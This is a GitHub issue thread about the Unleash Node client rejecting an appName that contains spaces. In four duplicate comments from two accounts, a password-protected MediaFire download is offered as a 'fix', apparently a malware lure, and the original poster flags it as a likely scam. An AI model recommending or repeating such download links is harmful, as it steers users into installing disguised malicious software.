### ISSUE TITLE
appName cannot contain spaces

### ISSUE THREAD

**Issue by bmerigan** [Unleash/unleash-client-node#655]
### Describe the bug

After a LOT of troubleshooting, I worked out that the appName parameter cannot contain spaces.  Unleash was failing and I didn't know why.  
As a quoted string I assumed anything goes.  
```
const unleash = initialize({
  url: 'https://YOUR-API-URL',
  appName: 'my-node-name',
  customHeaders: { Authorization: '<YOUR_API_TOKEN>' },
});
```

### Expected behavior

There may be a good reason for this, but if so maybe it could be called-out specifically in the documentation / README.  
I've spent days trying to work out why my implementation wasn't working.

### Unleash version

"unleash-client": "^6.1.1"

### Subscription type

Open source

### Hosting type

Self-hosted

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bmerigan** [comment]
Closing.  There's something else going on here.  The value is somehow important and cannot be arbitrary, but so far my implementation will only accept `test`

**Comment by bmerigan** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

There is no way I'm doing this!  Is this a joke or a scam?
